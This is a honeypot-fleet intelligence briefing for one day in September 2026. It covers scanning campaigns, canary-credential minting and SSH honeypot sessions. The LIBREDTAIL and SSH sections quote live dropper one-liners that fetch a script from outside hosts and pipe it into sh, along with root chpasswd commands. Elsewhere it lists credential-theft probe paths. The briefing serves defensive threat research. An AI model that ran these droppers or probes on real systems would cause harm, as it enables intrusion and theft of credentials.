FLUX FLEET — INTEL BRIEFING №22

Period: 2026-09-15 07:32 – 2026-09-16 07:32 UTC (24h digest window, day 21 of operations)
Sources: 7 honeypot nodes — canary-farm-1 (EU-hot), ai-devbox-1 (EU), control-1 (Middle East), ru-edge-1 (Russia), netcup-ts + sponge-01-ts + frantech-ts (deception-only, no canaries)
Confidence: High (direct observation, 21-day baseline, every result-tag spike attributed by spot query)

The digest window runs 07:32 UTC 09-15 to 07:32 UTC 09-16. The prior briefing №21 closed at 07:34 UTC 09-15, so this window holds a ~2-minute overlap. Times below are true UTC from the raw timestamp strings; the fleet-24h histogram labels its buckets in EDT (UTC−4), so true UTC is label + 4 h.

BLUF

The attribution fix changed this window more than any actor did. The socket-peer build deployed fleet-wide at 12:05–12:27 UTC 09-15: after 12:30, 14,404 window rows carry zero empty clientIp, named-IP inventory jumped from 21 unique IPs in №21 to 579 fleet-side, and the count of unattributed rows fell from 91.9% to 23.4% — all residual empties predate the deploy. Two censuses previously logged as empty-IP waves now have names: ALIYUN-PROBE returned as 69.5.20.14 (Byteplus, ID; 1,506 events across 3 nodes in ~1-minute runs), and METADATA-HUNT surfaced 8.234.173.27 (Google LLC; 1,053 events on canary-farm-1 with forged Claude-SearchBot/PerplexityBot/GrokBot UAs, 7 mints and 18 rejections in a 17-second burst). OMEGA-SWEEP returned at scale: the /46 block ran four census runs on 4 nodes (94.154.46.242/.243/.247/.244; 3,048 events, 26 mints) while an empty-IP Googlebot census hit canary-farm-1 at 1,041 paths in 15 s. Credential use stayed at zero for a fourth window: 69 credentials minted to 23 collectors, none used. Mint health improved sharply — 60 failures against 71 mints (0.85:1, the lowest ratio on record) against №21's 11.6:1.

Key Judgements

  1. The socket-peer fix closed the attribution gap: 0 empty-clientIp rows after deploy. Every row logged from 12:30 UTC 09-15 onward carries a named clientIp on all 7 nodes (14,404 rows; 0 empty). Window total: 15,667 of 22,144 rows named (70.8%). The 23.4% residual sits entirely before the deploy window. (High confidence — direct count on v_full for rows >= 2026-09-15 12:30; the empty share fell 86 → 0 within the deploy hour on control-1.)
  2. ALIYUN-PROBE is no longer sourceless: the campaign returned as a named runner, 69.5.20.14 (Byteplus Pte. Ltd., AS150436, ID). Its UA rotation matches the №21 registration exactly (python-requests/2.28.0, curl/7.68.0, forged and bare Googlebot/2.1, Chrome/120, Firefox/121), its 21-path /.aliyun/{config,credentials}.{bak,conf,env,js,json,old,php,txt,yaml,yml} sweep matches the registered list, and it ran near-identical ~500-event, ~400-path passes on 3 nodes (aidev 22:29, frantech 03:48, control 04:36 09-16). (High confidence — the UA set plus the 21-path /.aliyun/* list is the campaign fingerprint; first-ever named run.)
  3. The /46 block resumed census operations with a named-IP wave plus an empty-IP mirror run. 94.154.46.242 and .243 each ran the identical 743-path template on ai-devbox-1 (1,500/1,448 events, 10 mints each); .247 ran 1,042 paths on control-1 (1,050 events, 6 mints) plus a 150-path pass on canary-farm-1; .244 ran the 150-path pass on frantech-ts. An empty-IP Googlebot/2.1 census of 1,041 paths (15 s, 6 rejects) hit canary-farm-1 at 08:51, and 150/108-path empty-IP passes ran on frantech and netcup. (High confidence — wordlist identity verified by path-set union: 743 = 743 = 743 for .242/.243, and both equal 94.154.46.248's №20 list.)
  4. The mint→use funnel stayed closed for a fourth window, but mint health is the best measured. 71 issued rows (flux) / 69 credentials (Tracebit) went to 23 collectors with zero AWS use; 60 upstream rejections spread across 29 IP-sensor pairs, with the largest single-IP share (18 of 37 farm failures) inside 8.234.173.27's burst. Failure ratio 0.85:1 — first sub-1:1 window since tracking began. (High confidence on the zero-use count; the pull window covers the full credential TTL.)

Active Campaigns (day 21 status)

Recurring campaigns carry ⟳ and their registry names; first-seen signatures carry ⚠ NEW. Signatures, not IPs, are the campaign identity.

⟳ OMEGA-SWEEP (forged Googlebot/2.1 config census) — hostile, /46 block return, record single-run scale

  • Actors: The /46 block is back under named IPs: 94.154.46.242 (aidev 15:58, 1,500 ev/743 paths, 10 mints), 94.154.46.243 (aidev 20:50, 1,448 ev/743 paths, 10 mints), 94.154.46.247 (control 04:01–04:02 09-16, 1,050 ev/1,042 paths, 6 mints + farm 12:43, 300 ev/150 paths, 2 rejects), 94.154.46.244 (frantech 07:01, 300 ev/150 paths, 0). An unattributed mirror ran canary-farm-1 at 08:51 (1,049 ev/1,041 paths in 15 s, 6 rejects) plus 150/108-path passes on frantech (04:27) and netcup (06:19). All Omegatech LTD (US) except the empty-IP set. The /46 block is now the fleet's most active census operator and its members hold the top-4 aidev/control talker slots.
  • TTPs: Unchanged template, three run shapes: the 743-path core (aidev runs — path-set identical to .248's №20 list), a 1,041–1,042-path expanded list (control, empty-IP farm), and the 150-path short list (farm/frantech/netcup passes). Mint attempts concentrated at /.env: 26 mints in the window, 6 rejects. No Aliyun-family paths in the control run (verified: 0 matches).
  • Assessment: The block's named operators rotate run-for-run (.242 → .243 → .247/.244), the same rotation the registry has tracked since №16. The block now holds 46 window mints plus 20 pre-existing hoard credits; all unused. The empty-IP mirror run of the 1,041-path list suggests a second host in the same operator set outside the /46 block. Watch for a use event from any /46 credential — the block is the standing hoard leader.

⚠ ALIYUN-PROBE → NAMED: 69.5.20.14 (Byteplus) — hostile, campaign now attributed

  • Actors: 69.5.20.14 (Byteplus Pte. Ltd., AS150436, ID), first-ever appearance 2026-09-15 22:29. Three runs: aidev 22:29–22:30 (513 ev/401 paths), frantech 03:48–03:49 (480 ev/390 paths), control 04:36–04:37 (513 ev/401 paths). Byteplus is ByteDance's cloud arm — rented infrastructure, not a corporate scanner.
  • TTPs: The №21 fingerprint intact: 9-UA rotation (python-requests/2.28.0, curl/7.68.0, forged + bare Googlebot/2.1, Chrome/120 ×3 OS variants, Firefox/121), 21-path /.aliyun/* credential sweep (verified exact match: config.{bak,conf,env,js,json,old,php,txt,yaml,yml} + credentials.{bak,conf,env,js,json,old,php,txt,yaml,yml}), 195 China-cloud credential paths (/aliyun.*, /alicloud.*, /oss.*, /tencent.*, /huawei*, /volc*), extension-suffix fanout, plus webshell probes (/obs.php, /oss.php, /aliyun.phpwebshell-probe 200s). 2 mint rejections, 0 mints. Runs 6–8 h apart on 3 nodes; aidev and control lists are byte-identical (401 = 401), frantech 390 is a subset.
  • Assessment: This answers №21's Gap 1: the campaign IS fleet-wide automation, and the attribution fix let us name the fourth node's operator. The wordlist grew from the 404-path list to 401–414 paths with the China-cloud census deepened (/huawei*, /volc* additions absent from the №21 sample journeys). The webshell-probe hits on *cloud.php paths push this past credential collection — the template tests for planted shells too. Watch for ru-edge-1, sponge, and netcup passes.

⚠ METADATA-HUNT → NAMED RUNNER 8.234.173.27 — hostile, first named-IP burst since №20

  • Actors: 8.234.173.27 (Google LLC, AS396982, US), first-ever appearance, single run on canary-farm-1 00:03–00:03:29 09-16 (1,053 events, 784 paths, 17 s).
  • TTPs: 165 trap families in one run: __aws_leak_probe marker, 108 /@fs rows (vite-fs-aws-credentials-file, -etc-passwd, -proc-environ, -firebase-json), 8 /mcp, 4 /graphql introspection POSTs, .env-variant fanout, and the campaign's forged AI-crawler UA rotation now including Claude-SearchBot/1.0, Claude-User/1.0, and a Firefox/127.17; compatible; Claude-SearchBot hybrid (178 Claude-UA rows). Mint outcome: 7 issued + 18 tracebit-http-error rejections, all at /.env in the same minute — the campaign's signature burst-speed rejection pattern, now seen under a named IP.
  • Assessment: The empty-IP wave's tooling now runs under a GCP address, matching the F5-corroborated Vite-scan profile (CVE-2026-39364 leg: /@fs + ?raw?? probes). The mint-failure share says the operator still mints at burst speed. This is the campaign's first named appearance since 136.117.52.210 (№20) — the hoarder precedent says: expect 25-mint batches from this IP or its neighbors in later windows. A second companion Google IP, 34.17.8.94 (Google LLC, IT), ran a smaller 234-event .env-variant pass (166 paths, bare Chrome/131, tarpit-loop retries, 0 mints) 2 h earlier on aidev — first-ever rows for that IP; watch for a repeat before linking it.
  • Empty-IP wave status: No large burst in this window. Two 9/7-row marker passes (aidev 04:27, 03:40 09-16) and the frantech 07:47 pass (767 ev/596 paths/100 UAs, 39 @fs, 0 mint outcomes) — the frantech pass carries the campaign's marker set at reduced scale. Wordlist maintenance continues.

⟳ SS-NET TOOLING — hostile, named return after 5 idle windows, wordlist now shared with a new operator

  • Actors: 80.94.95.211 (SS-Net, RO) returned: aidev 00:29–00:30 (214 ev/212 paths) and ru-edge-1 02:48–02:49 (212 ev/209 paths), 1 mint rejection each. Tenth window in the campaign's history, first since №19.
  • TTPs: The .env-variant walk with fake-git stages and the campaign's known result sequence (/.envbackend/.envapi/.envsendgrid.envphpinfoadmin/.env → ...). The digest registered this journey as NEW signature fa6433fb567c (4 IPs, 819 ev, fleet-wide) — the same 12-step shape now shared by the Byteplus runner's core. Result sequence matches the Feo Prest .175 shape, as documented in №16.
  • Assessment: The shared wordlist set now spans three operator families (SS-Net RO, Feo Prest DE, Byteplus ID) — commodity census tooling circulating between renting actors. 9 windows of minting (4 all-time creds) and zero use.

⟳ Feo Prest census family (MSIE/Safari forgery + Android UA passes) — hostile, standing, now multi-node

  • Actors: 213.209.159.175 (Feo Prest SRL, DE) ran 5 passes in the window: farm 15:24 (114 ev, MSIE-9), farm 02:34 09-16 (114 ev, Safari/125-PPC class), control 12:07 (165 ev, Firefox/3.0.8-class), control 23:33 (49 ev, Android Chrome/61, 1 mint at /.env). Plus 1 upstream rejection per farm pass.
  • TTPs: Same ~112-path .env census under rotating antique-browser forgeries, 1 mint or 1 reject per pass. The control 23:33 Android pass minted — the first Feo Prest cred since 09-10.
  • Assessment: Third consecutive window with named-IP activity (census line crossed №14, farm+control №21, now 5 passes in one window). The /24 remains a census operator with persistent minting; promotion to a hoard watch stays armed.

⟳ REGISTRY-HUNT (LeakIX l9scan) — borderline scanner, largest wave since №15

  • Actors: 16 IP-sensor pairs this window, all DigitalOcean except 209.38.208.202/.248.17 (the same pair-class as №15): aidev runners 159.223.132.86, 64.226.65.160, 138.197.191.87, 209.38.248.17, 134.209.25.199, 206.189.19.19, 159.89.174.87, 64.226.65.160, 207.154.197.113; farm runners 167.71.81.114, 167.99.181.249, 68.183.180.73, 138.68.144.227, 138.68.86.32, 209.38.208.202, 142.93.143.8, 64.227.70.2. 39–82 events each, 41 ev per run typical.
  • TTPs: Unchanged 12-step walk. 13 /.env mints in the window (1 per named IP; 2 on the 64.226.65.160 double-run) — the runner set now mints reliably at 1/IP.
  • Assessment: The named-runner rotation is now 16 IPs over 5 h (18:13–21:40) versus 6 in №21 — the pool grew, or the pool probes each node with fresh IPs per session. Borderline per registry: public leak-scanning service, mints collected, no criminal payload. 64.226.65.160 holds 3 all-time creds across two windows — the only repeat minter.

⚠ WP-LOGIN-PROBE (directory fanout, 6 IPs, both basin groups) — new shape, low volume

  • Actors: 6 IPs across 5 nodes: 169.58.204.147 (Contabo FR, farm), 15.235.185.191 (OVH SG, farm), 51.178.48.203 (OVH FR, aidev), 51.75.142.41 (OVH FR, frantech+sponge), 91.134.242.90 (OVH FR, control), 43.163.81.168 (Tencent SG, control). 06:43–07:29 09-16, 2–3 events per node, no POSTs.
  • TTPs: 6–7-path wp-login.php directory fanout (/wp-login.php, /wp/, /cms/, /site/, /wordpress/, /admin/, /wp-login/), 5 rotating UAs per IP (Firefox/128, Chrome/126, Edg/125, Safari/17.5-iOS, Firefox/128-Android), wp-login-probe 200 on the root path, 404 on the directory variants.
  • Assessment: First appearance of the /wp/-directory wp-login.php fanout in fleet history — the WP-LOGIN-BRUTE family's distributed probe stage has a new path grammar. 20 first-seen paths, all at the same 03:31 sync-arrival mark, one node per IP. Volume is inventory-scale; promote on a return with credentials or POSTs.

⟳ MALWARE-DICT-2 (IoT dropper dictionary) — hostile, contracted but synchronized

  • Actors: Unattributed (empty UA). Control-1 303 ev/95 paths, ru-edge-1 309 ev/98 paths, hourly.
  • TTPs: Wordlist contracted this window: 95–98 paths vs 207–208 in №21 — the /huhu/titanjr.* and /bins/sora.* families ran, but most of the older set did not. Byte-identical hourly timing across both nodes persists.
  • Assessment: The dual-node loop continues; the wordlist shrank for the first time since registration. Watch for re-expansion before calling the feed stale.

⟳ LIBREDTAIL-KIT (phpunit RCE chain) — hostile, eighth window, dropper host stable

  • Actors: Unattributed, libredtail-http UA. 6 runs: farm 196 ev/28 POSTs (05:19 → 02:53), ru-edge 49/7 (19:18), frantech 49/7 (23:58), sponge 49/7 (05:54), netcup 4/4 (00:13), aidev 46/4 (04:14). 393 events, 55 POSTs.
  • TTPs: Dropper captured on all 7 POST runs: (wget --no-check-certificate -qO- https://217.60.103.56/sh || curl -sk https://217.60.103.56/sh) | sh -s apache. All runs dropper to 217.60.103.56 — the №17 split host consolidated to one staging host.
  • Assessment: The bodyPreview gap closed: 129 of 195 POST bodies captured this window (the №20–№21 zero-capture streak ended — the gap item is resolved as a transient, not a feed defect). Staging host unchanged from №17. Zero mints; wants execution.

⚠ NEW: 45.148.10.5 (CREDSWEEP-sibling .env walker) — hostile, first appearance

  • Actors: 45.148.10.5, first-ever rows 03:21–04:08 09-16, control-1 + netcup-ts, 112 events, ipsum-listed hosting (45.148.10.x).
  • TTPs: .env-variant census (/.env.testing, /.env.sandbox, /.env_sample, /settings/.env, /configuration/.env) plus /.git/config (fake-git 200s), forged browser UAs, 1 mint rejection at /.env.
  • Assessment: Same /24 as CREDSWEEP's standing 45.148.10.238 (absent since №15). The block keeps a second census tooling generation. Promote to campaign on a second run.

⚠ NEW: 129.222.206.62 (SpaceX/Starlink, NG) — residential collector, 3 synchronized runs

  • Actors: 129.222.206.62 (AS14593 Starlink, Nigeria), first-ever appearance 18:35 09-15. 96 events on aidev+canary-farm-1 in 3 paired runs (18:35, 21:35/21:40, 00:45/01:07).
  • TTPs: Per run: 14 python-requests/2.34.2 tarpit-loop events, then 2 /.env GETs under forged Chrome/120. Mints: 8 of 12 attempts issued (2+2+2+2 across runs), 4 rejections — a 2-mints-per-run pattern, byte-identical timing on both nodes.
  • Assessment: First Starlink source in fleet history. The paired-node minting with python-requests tarpit loops is a distinct tooling shape, not the census campaigns'. 8 creds held, 0 use. Watch for a fourth paired run.

⚠ NEW: WP-BROWSER-IMPERSONATION set (Chrome/126 + Firefox/3.0.9-class absent, antique UAs return under new IPs)

  • Actors: Scattered single-IP passes under Chrome/81.0.4044.129, Chrome/120 (X11), Firefox/1.0.4, MSIE 8.0 class, plus new collector 198.71.50.113 (IONOS US, Android Chrome/142, 19 ev, 1 mint at 21:01) and 67.207.85.155 (DigitalOcean US, 2 nodes, 1 mint at 18:27).
  • TTPs: Single-node ~12–27-path .env-variant walks, 1 mint or 1 reject per run. The 06:45–08:16 farm cluster (8+3 empty-IP rejections plus 5 Chrome/81 mints) suggests one small operator rotating UAs per request.
  • Assessment: The CREDSWEEP-lineage one-pass-per-UA shape continues under fresh IPs. No wordlist linkage proven; inventory-level.

Standing actors (persistence check)

  • frantech Chrome/114 /c/ crawler — 5th consecutive window on frantech-ts: 360 events/360 unique random-token paths across the same 4 vanity Host headers (we-love-the.world, raw.bunnyfeet.baby, tls.bunnyfeet.baby, make-internet-safer-for-the.world). Volume flat (360 vs 430). The 151.243.11.x cluster (11 IPs, 210 events of 10–30 fetches each, same /c/ shape) joined this window — first multi-IP expansion of this shape; watch.
  • 70.8.208.88 — our own ops probe from the deploy (7 nodes, 12:05–12:19 09-15): /definitely-not-a-trap-deploy-check-*, /verify-plain|forged|chain|selfclaim. Benign by construction; produced the window's only 2 xffPeerMismatch rows (8.8.8.8/8.8.4.4 forged against real peer 70.8.208.88) — the counter works as designed. Not an actor.
  • Uptime-prober trio — 89.248.172.33 (135 ev, 3 nodes), 93.174.93.12 (108 ev, 3 nodes) unchanged, /-only, benign-shape. 89.248.172.11/171.24 present at 9/0 ev (6/2 nodes). 80.82.77.202 absent this window.
  • 45.148.10.120 (2 ev, 2 nodes) — the №22-quirk-verification scan row; unchanged.
  • Absent this window: 194.180.49.37 and 91.245.74.31 (third), 80.94.95.211 was present (see SS-NET), 176.65.148.71 (third), 45.148.10.238 (fifth), 94.154.46.245/.246/.248/.249 (the .242/.243/.247/.244 set now carries the block), 136.117.52.210, 35.245.185.138, 45.67.211.147, 204.76.203.x (the Pfcloud loop sat silent — first absence since №13), NIGHTAGENT (fifth idle), XMLRPC-BRUTE (fifth silent: 0 xmlrpc events), CRUSADER-SWEEP (sixth idle), CURL-SWEEP (fifth miss, standing-paused), ENV-CENSUS-3/4 (both absent — Chrome/126.0.0.0 UA rows: 0), GCP-ACONF (fifth), 40.87.20.23 (second).
  • 93.152.221.173 (Omniline BG sibling) — first appearance 22:19, 84 ev, /+/.next/.env+/debug/.env tarpit loops, 1 mint rejection. Watch with the .9/.10/.11 sibling pool.

Canary credentials

Summary

No canary credentials were used in AWS during the window. Fleet sensors minted 69 credentials to 23 collector IPs; none reached AWS.

Mint → use funnel

Metric Count
Credentials minted (fleet, window) 69
Distinct collector IPs 23
Credentials used in AWS (alerts) 0
Credentials stolen, no observed AWS use in window 69

Per collector (evidence for attribution prose — join each IP against ip-journey and the campaign registry):

Theft IP Sensor Mints (window) Creds used in AWS Use IPs Operations Mint history (6d)
94.154.46.242 ai-devbox-1 10 0 0 10 mints since 2026-09-15 15:58
94.154.46.243 ai-devbox-1 10 0 0 10 mints since 2026-09-15 20:50
8.234.173.27 canary-farm-1 7 0 0 7 mints since 2026-09-16 00:03
94.154.46.247 control-1 6 0 0 6 mints since 2026-09-16 04:01
129.222.206.62 ai-devbox-1 4 0 0 8 mints since 2026-09-15 18:35
129.222.206.62 canary-farm-1 4 0 0 8 mints since 2026-09-15 18:35
64.226.65.160 ai-devbox-1 2 0 0 3 mints since 2026-09-09 14:16
102.220.161.139 ai-devbox-1 1 0 0 1 mints since 2026-09-15 21:00
134.209.25.199 ai-devbox-1 1 0 0 2 mints since 2026-09-09 19:54
138.197.191.87 ai-devbox-1 1 0 0 2 mints since 2026-09-09 14:26
138.68.144.227 canary-farm-1 1 0 0 3 mints since 2026-09-09 14:27
138.68.86.32 canary-farm-1 1 0 0 1 mints since 2026-09-15 21:03
142.93.143.8 canary-farm-1 1 0 0 1 mints since 2026-09-15 20:29
159.223.132.86 ai-devbox-1 1 0 0 1 mints since 2026-09-15 18:13
159.89.174.87 ai-devbox-1 1 0 0 1 mints since 2026-09-15 21:40
167.71.81.114 canary-farm-1 1 0 0 3 mints since 2026-09-09 22:04
167.99.181.249 canary-farm-1 1 0 0 2 mints since 2026-09-09 22:02
198.71.50.113 ai-devbox-1 1 0 0 1 mints since 2026-09-15 21:01
206.189.19.19 ai-devbox-1 1 0 0 2 mints since 2026-09-09 22:06
209.38.208.202 canary-farm-1 1 0 0 1 mints since 2026-09-15 21:40
209.38.248.17 ai-devbox-1 1 0 0 1 mints since 2026-09-15 20:29
213.209.159.175 control-1 1 0 0 3 mints since 2026-09-10 22:43
67.207.85.155 ai-devbox-1 1 0 0 1 mints since 2026-09-15 18:27
68.183.180.73 canary-farm-1 1 0 0 1 mints since 2026-09-15 20:18

Persistent collectors with no observed AWS use (candidates for hoard/resale/untraced use — check prior briefings for named campaigns):

  • None: 46 mints, 2026-09-12 08:14 → 2026-09-15 10:51
  • 136.117.52.210: 26 mints, 2026-09-14 00:41 → 2026-09-14 00:41
  • 34.32.131.244: 25 mints, 2026-09-11 21:44 → 2026-09-11 21:44
  • 34.6.12.67: 25 mints, 2026-09-09 09:09 → 2026-09-09 09:09
  • 94.154.46.249: 12 mints, 2026-09-11 13:47 → 2026-09-11 13:48
  • 94.154.46.242: 10 mints, 2026-09-15 15:58 → 2026-09-15 15:58
  • 94.154.46.243: 10 mints, 2026-09-15 20:50 → 2026-09-15 20:50
  • 94.154.46.245: 10 mints, 2026-09-10 16:25 → 2026-09-10 16:25
  • 94.154.46.246: 10 mints, 2026-09-12 04:12 → 2026-09-12 04:13
  • 129.222.206.62: 8 mints, 2026-09-15 18:35 → 2026-09-15 21:40
  • 8.234.173.27: 7 mints, 2026-09-16 00:03 → 2026-09-16 00:03
  • 94.154.46.247: 6 mints, 2026-09-16 04:01 → 2026-09-16 04:02
  • 136.70.175.146: 4 mints, 2026-09-12 06:33 → 2026-09-12 06:33
  • 160.177.217.115: 4 mints, 2026-09-11 21:02 → 2026-09-11 21:43
  • 167.99.79.44: 4 mints, 2026-09-11 18:18 → 2026-09-11 18:19
  • 176.65.144.71: 4 mints, 2026-09-09 21:56 → 2026-09-09 21:56
  • 80.94.95.211: 4 mints, 2026-09-09 14:34 → 2026-09-12 02:32
  • 138.68.144.227: 3 mints, 2026-09-09 14:27 → 2026-09-15 21:40
  • 142.93.129.190: 3 mints, 2026-09-09 06:26 → 2026-09-10 20:23
  • 167.71.81.114: 3 mints, 2026-09-09 22:04 → 2026-09-15 21:03
  • 213.209.159.175: 3 mints, 2026-09-10 22:43 → 2026-09-15 23:33
  • 64.226.65.160: 3 mints, 2026-09-09 14:16 → 2026-09-15 21:40

Canary-use attribution (briefing prose)

Window attribution is now near-complete: 44 of 71 issued rows map to named IPs, against 21 unique named IPs fleet-wide in №21. Named collectors by campaign: OMEGA-SWEEP /46 block (94.154.46.242 ×10, .243 ×10, .247 ×6 — the block's 26 window creds join the standing hoard), METADATA-HUNT (8.234.173.27 ×7), ALIYUN-PROBE (69.5.20.14, 0 mints, 2 rejections), REGISTRY-HUNT (11 one-per-IP mints across 10 runners), Feo Prest (.175 ×1 at control 23:33), and the first Starlink collector 129.222.206.62 (×8 across 3 runs, 4 in-window). The empty-IP None hoard grew 37 → 46 (pre-deploy rows only). The standing hoard across named collectors now exceeds 220 credentials with 2 use events ever (both 09-13's CREDENTIAL-DRAIN). The deny-first IAM posture remains the load-bearing control.

Two new named collectors minted for the first time ever: 102.220.161.139 (VPS Dedicated LLC, SI — CREDSWEEP-lineage sibling of №13's 102.220.161.87; two visits, .env directory walks, 1 mint at 21:00) and 198.71.50.113 (IONOS US, 19 ev, 1 mint at 21:01).

Fleet Observations

  • Attribution fix shipped and checked (the cycle's fleet-side change). The socket-peer build (flux/server.py md5 1620bee5e21b2ce6b97876949d69abbc) went to all 7 nodes 12:05–12:27 UTC 09-15. Empty-clientIp share: 0 rows in 14,404 after 12:30 UTC, on every node, versus 23.4% for the full window and 91.9% in №21. Named-IP inventory: 579 fleet-side vs 21 in №21. The residual pre-deploy empties (5,196 rows) stay unattributable — their IPs died with the old build.
  • XFF forgery counters: first non-zero fourth line, and it is our own probe. 800 requests carried X-Forwarded-For, 1 multi-entry chain, 8 ignored-as-source, 2 mismatch rows. Both mismatches are 70.8.208.88's /verify-forged and /verify-chain requests from the deploy check (forged 8.8.8.8/8.8.4.4 headers, real peer 70.8.208.88) — the counter's design validation, not hostile attribution. Thirteenth clean window for hostile XFF forgery.
  • Canary economics: 71 issued rows / 69 credentials (Tracebit) to 23 collectors, 60 upstream rejections (farm 37, aidev 17, control 5, ru-edge 1). Failure ratio 0.85:1 — the best since the 0-failure №16 window, against 11.6:1 in №21. Root causes, all attributed: 8.234.173.27's 17-second burst drove 18 farm rejects (mint-burst rate limiting per the №17 quirk); the empty-IP OMEGA mirror added 6; scattered 1–2 rejections from SS-Net, 129.222.206.62, Feo Prest, and the /46 pool's 94.154.43.164/.146 singles. All failures aws-type at /.env-family paths.
  • TLS/attribution posture: farm logged 224 https events (sso.rightabouteverything.show 453 Host-header hits), aidev 566 (inference.fapthropic.com 1,085), the five certless nodes 0. New Host-header noise on farm: vmi3243483.contaboserver.net (210 hits) — a Contabo hostname aimed at a Contabo-source scan; treat as Host-header injection inventory.
  • Result-tag spikes, all attributed: aidev webshell-probe 83 (5.9×) = 69.5.20.14's China-cloud census (36) + the /46 743-path runs (43) + singles. control webshell-probe 48 (10.7×) = 69.5.20.14 (36) + .247 (12). frantech webshell-probe 55 (inf — 0 baseline) = 69.5.20.14 (41) + .244 (14). farm fake-git-miss 26 (9.8×), vite-fs-aws-credentials-file 40 (4.3×) = 8.234.173.27's single run. farm env-production-error 400 (3.1×) = the OMEGA runs plus the frantech 07:47 empty-IP census (767 ev/596 paths). control app-config-python 20 (3.9×) = inside .247's 1,042-path run.
  • Fleet volume: 22,144 events in the wrapper's exact window (digest 24h table: 19,639-row-era comparability broken by the fix — per-node uniq-IP counts now include real names: 93/118/61/66/85/83/73 vs the fix-depressed №21 cells). Biggest moves: aidev +87% (the two /46 743-path runs), frantech +104% (empty-IP 07:47 census + .244 pass + 69.5.20.14), control +44% (.247 + 69.5.20.14 + Pfcloud-loop residue), sponge −64% (MALWARE-DICT-2 contracted and no census pass landed).
  • Control discovery velocity, day 21: 4,795 events, 62 unique IPs, +44% over the 7-day event baseline. The unique-IP cell is no longer the ~1-row artifact of the blind-sync era: 61 named IPs on the node. Ramp series (events): 39 → 70 → 88 → 107 → 105 → 105 → 100 → 98 → 99 → 108 → 120 → blind ×3 → 51 → 52 → blind → blind → 4,254 → 3,152 → 5,378 → 4,795.
  • New UA inventory (hostile-shaped): forged Claude-SearchBot/1.0, Claude-User/1.0, ClaudeBot/1.0 strings inside 8.234.173.27's rotation — the campaign's crawler-forgery set now includes Anthropic-branded UAs, a first. Benign: Censys 47, zgrab 65, OAI-SearchBot 123, Palo Alto 25, Modat 16.

SSH/telnet honeypot (frantech-ts — single sensor, not fleet-wide)

  • New commands: 6 of 51 distinct (my count against the full hp history; the digest's day-file window reports 0 of 51 — the day-file boundary differs from the digest window by ~7 h). All 6 are password-change commands, four of them chpasswd with fresh 12-char values: 120.48.90.166 (echo "root:VssceeYV4TRu"|chpasswd|bash, hour 0), 202.105.188.66 (root:kvX2mCjZL79p, hour 3), 36.111.40.138 (root:9DY1tpGmRnVS, hour 3), 113.240.110.90 (root:LENgPanEIkgX + deploy:LKRU4G1v7gNG passwd, hour 4, 24 commands total). One genuinely new dropper command: 94.154.43.69 (root, hour 5) ran cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://213.232.114.14/nokillbins/handshakebins.sh; curl -o handshakebins.sh http://213.232.114.14/nokillbins/... — the first appearance of the /nokillbins/ path; the base URL 213.232.114.14/handshakebins.sh ran on 09-12/14/15.
  • The /46 block ran a hands-on session on the ssh honeypot. 94.154.43.69 (Storm Industries, NL — the same /46 pool that feeds OMEGA-SWEEP's mints) logged in as root with password Password (4 accepted logins) and pulled the dropper twice. First post-auth activity from the /46 block anywhere in the dataset; the pool is not census-only.
  • Password-reset loop: 4 IPs ran passwd/chpasswd in this window (7 rows) plus the 09-15 file's 8 IPs (117.50.73.90 ×4, 171.220.244.134 ×8, 58.209.234.84 ×8 inside the overlap segment) — the persistence-automation pattern №21 named continues at lower per-IP volume.
  • Funnel (digest numbers): 482 sources sent credentials → 370 got a shell (77%) → 169 ran a command (46% of shell-getters, 35% of sources). Event level: 46,009 attempts → 18,930 accepted logins → 12,724 commands (67% of accepted logins run something). Per-login conversion rose from 57% (№21) to 67% — more accepted logins end in operator action.
  • Credentials: 28,479 distinct pairs, 0 new per the digest. Concentration unchanged: 345gs5662d34/3245gs5662d34 family owns the top rows (1,388 + 1,043 + 72 + 61 across 4 usernames) — commodity noise.

Gaps / Next Collection

  1. 8.234.173.27 follow-up. First named METADATA-HUNT runner since №20, 7 creds + 18 rejections in one burst. If it returns with a 25-mint batch, it joins the hoarder pattern; check Tracebit use alerts for its /.env creds specifically next cycle.
  2. ALIYUN-PROBE fleet completion. 69.5.20.14 hit 3 nodes; ru-edge-1, sponge-01-ts, and netcup-ts passes did not appear in this window. A pass on any of the three makes the №21 fleet-wide-automation call certain; the campaign's China-cloud census deepened (195 China-cloud paths, huawei/volc additions).
  3. /46-block hands-on follow-up. 94.154.43.69's ssh-honeypot session (root/Password → dropper) is the block's first post-auth activity. Next cycle: check whether 213.232.114.14/nokillbins URLs appear in the flux side or on other nodes, and whether any /46 IP returns to the ssh surface.
  4. 94.154.46.247's 1,042-path list vs the №21 1,041-path control run. One path changed. Diff the two lists next cycle to track the template's drift direction.
  5. 129.222.206.62 fourth paired run. Three byte-paired aidev+farm runs at ~3 h spacing; a fourth would establish schedule. Starlink residential source — watch for cross-IP rotation.
  6. frantech 07:47 empty-IP census identity. 767 events/596 paths/100 UAs with @fs markers but zero ssrf-relay rows — a METADATA-HUNT variant with a trimmed wordlist, run 2 h 45 min after the named 8.234.173.27 burst. Pull its path list and diff against the 631–633-path №20–№21 lists.

Generated on medina (headless systemd run). Digest: /data/flux-logs/reports/flux-digest-2026-09-16.md. Spot queries: flux-query.sh fleet-24h, crossnode-reuse, mint-health, mint-collectors, ip-journey (8.234.173.27, 69.5.20.14, 213.209.159.175), plus 30 ad-hoc v_full queries (attribution-fix window check, XFF mismatch detail, OMEGA wordlist union tests, ALIYUN-PROBE recurrence and path-set match, METADATA-HUNT named-runner anatomy, SS-Net journey signature, Feo Prest pass linkage, LIBREDTAIL dropper capture, new-collector profiles, hp new-command history comparison, /46-block hands-on check).